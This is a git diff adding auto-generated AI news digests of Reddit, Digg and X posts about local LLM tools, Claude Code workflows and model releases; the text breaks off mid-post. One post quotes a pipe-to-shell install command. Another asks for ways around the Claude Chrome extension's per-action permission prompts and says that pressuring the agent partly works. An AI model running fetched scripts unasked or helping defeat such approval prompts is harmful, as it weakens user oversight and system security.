signatures in open source AI.](https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! <3 + +--- + +## [Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.](https://www.digg.com/ai/tvrhpn35?rank=2) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [ggufy: easy quantization for the GPU poor](https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/) +*Reddit r/StableDiffusion* | 21/05/2026 | Score: 0.94 +Tags: product_launch, cli_tool + +> Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i… + +--- + +## [i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours](https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 +Tags: developer_tool, tool_update + +> been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing "i will now" instead of calling the tool, it stops and fires - requires evidence before claiming done. no "should be fixed" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. genuinely sharing what worked after burning through hundreds of sessions figuri… + +--- + +## [Claude Code vs Codex Explained](https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 +Tags: developer_tool, cli_tool + +> Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli) + +--- + +## [Latest b9274 Addresses MTP VRAM leak](https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: product_launch + +> [B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\_context\_impl only cleaned up the main model and context (via llama\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\_dft), or draft model (model\_dft). For MTP (Multi-Token Prediction) models, ctx\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\_dft, and model\_dft in destroy() before resetting llama\_init, ensuring proper cleanup order to avoid use-after-free. + +--- + +## [Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.](https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 +Tags: developer_tool + +> Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. - a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti… + +--- + +## [Qwen3.6 35Ba3 has changed my workflows and even how I use my computer](https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: developer_tool + +> My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \- devops on a VPS \- using docling to create epubs from old PDFs \- using playwright to test stuff \- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: "pi pal, install me please this python library in an .env and do X"; "hey pi, check what is using most space from the memory"; "clean X"; "check my network"; "change X configuration", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then "asked the transcript" to create a content structure for the landing page for the project mentioned in the audios. I got the proper structure and pasted it into a markdown file [conten… + +--- + diff --git a/data/digest-2026-05-22.md b/data/digest-2026-05-22.md new file mode 100644 index 0000000..d9c44b3 --- /dev/null +++ b/data/digest-2026-05-22.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-05-22** | 15 stories | Auto-generated from 512 archived stories + +--- + +## [New Release of ROCm based MLX LLM Engine - lemon-mlx-engine](https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/) +*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 +Tags: api_update, product_launch, developer_tool + +> Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! [https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable) + +--- + +## [Claude Chrome extension nerfed?](https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/) +*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.86 +Tags: developer_tool, tool_update, agent_tool + +> Past few weeks or so the Claude Chrome extension has been asking permission for every single action. Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with "I can't proceed without explicit approval." Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS. + +--- + +## [KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.](https://www.digg.com/ai/yuusdejg?rank=6) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Phosphene 3.0 — open source AI video + image suite for Apple Silicon. Train your own LTX characters.](https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/) +*Reddit r/StableDiffusion* | 22/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from "yet another LTX wrapper": you can \*\***train your own characters**\*\* inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \~3 hours per character on an M4 Max 64 GB. \*\***What 3.0 ships**\*\* \- Text → video+audio (LTX-2 generates joint audio+video in one pass) \- Image → video+audio \- Audio → video (drive a clip with an audio reference) \- FFLF (first frame + last frame interpolation) \- Extend (continue an existing clip) \- Character training (face + optional voice LoRA, from a single dataset) \- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. \*\***HiDream-O1 ported to MLX**\*\* HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \~67 seconds per 1024² on a 64 GB Mac. \*\***Hardwa… + +--- + +## [Sam Altman makes 'mic drop' offer to every Y Combinator startup](https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/) +*Reddit r/ChatGPT* | 22/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs… + +--- + +## [Which MCP servers are actually changing your Claude workflow? Sharing mine](https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/) +*Reddit r/ClaudeAI* | 22/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to "How do I provide Claude with enough information to help me without having to always watch the context box?" What are people running? Specifically looking for underrated or domain specific things that don't come up as often. + +--- + +## [Gmail tie-ins](https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/) +*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here. + +--- + +## [Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.](https://www.digg.com/ai/hpkmhl2b?rank=7) +*Digg AI* | Score: 0.94 +Tags: product_launch, developer_tool + +--- + +## [I built a music notation app with Claude, and Claude is also a feature inside it](https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/) +*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.78 +Tags: open_source, developer_tool + +> I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium) + +--- + +## [DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. — The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.](https://www.digg.com/ai/axzmul0l?rank=1) +*Digg AI* | Score: 1.00 +Tags: api_update + +--- + +## [DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.](https://www.digg.com/ai/axzmul0l) +*Digg AI* | Score: 1.00 +Tags: api_update + +--- + +## [Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of eve…](https://x.com/AlphaSignalAI/status/2057875938180755757) +*X search / AI model updates* | 22/05/2026 | Score: 1.00 +Tags: developer_tool + +> Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev + +--- + +## [Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…](https://x.com/svg_icons/status/2057874901252370492) +*X search / Agent workflows* | 22/05/2026 | Score: 1.00 +Tags: mcp + +> Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claude-custom-connector … #Claude #MCP #AI #WebDev + +--- + +## [I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assum…](https://x.com/IShmool/status/2057872918348976191) +*X search / AI model updates* | 22/05/2026 | Score: 1.00 +Tags: cli_tool + +> I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7 + +--- + +## [trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser](https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/) +*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 +Tags: tool_update + +> Trained a prompt injection classifier using `ml-intern` \+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. I also tried training an HRM-Text model, but the agent didn't figure it out and set up… + +--- + diff --git a/data/digest-2026-05-23.md b/data/digest-2026-05-23.md new file mode 100644 index 0000000..796d620 --- /dev/null +++ b/data/digest-2026-05-23.md @@ -0,0 +1,121 @@ +# Stack Scout - AI News Digest +**2026-05-23** | 15 stories | Auto-generated from 332 archived stories + +--- + +## [Open-source devtool for AI agent projects [P]](https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/) +*Reddit r/MachineLearning* | 23/05/2026 | Score: 1.00 +Tags: api_update, open_source, agent_tool + +> Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. here is a demo video showing the execution of a multi-agent system: [3\_mins\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.… + +--- + +## [Apex-Testing: real-world, real repos, agentic coding benchmark (Update)](https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> **BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** "**What is APEX Testing?** Every week there's a new model that's "the best ever." Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. You get to see what actually works and what's just marketing." **What's included currently in metrics:** \- Avg Cost \- Avg Time \- Scoring based off each category/difficulty \- ELO-based Leaderboard (see details on the… + +--- + +## [LLaMa.cpp basic question](https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> I'm trying to install LLaMa with PI agent. I ran curl -fsSL https://pi.dev/install.sh | sh export PATH="/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it? + +--- + +## [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> # 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-… + +--- + +## [IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs](https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/) +*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword "recipe" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the "recipe book for your LoRAs", and it's still 100% Open-Source! I've even added 1-click Windo… + +--- + +## [got tired of claude code forgetting everything every session, built VIR for it](https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/) +*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.86 +Tags: mcp, cli_tool + +> Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. You can also query it yourself if you're curious what's in there: \`\`\` vir query "what gotchas have i hit with auth" \`\`\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux… + +--- + +## [Four calls became one: letting the agent author tools mid-session](https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/) +*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. The runtime registers it witho… + +--- + +## [Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.](https://www.digg.com/ai/esmbs3o1?rank=8) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.](https://www.digg.com/ai/h7rp9igv?rank=6) +*Digg AI* | Score: 1.00 +Tags: agent_tool + +--- + +## [What features do you wish ComfyUI or A1111 had?](https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/) +*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 +Tags: open_source + +> TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im… + +--- + +## [GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.](https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/) +*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 +Tags: api_update + +> Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. The Readme covers all the details and modifying the hard coded parts is quite simple. Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach. + +--- + +## [Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.](https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: api_update + +> Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a "don't call any tool" trap). 5 mock tools. Three metrics per run: parse\_success, tool\_match, args\_match. Same queries, same eval rubric, same hardware. Headline numbers: Needle (26M) Qwen3 (0.6B) tool_match overall 72.0% 56.0% parse_success 84.0% 54.0% args_match | match 97.2% 100.0% mean latency 10.9s 47.9s The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\_web instead of run\_command. * **Qwen3** fails by not calling a tool at all. Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. When it does emi… + +--- + +## [GPT 5.5 "secret sauce" is just having the thinking be some stupid caveman mode?](https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: open_source + +> I think I had 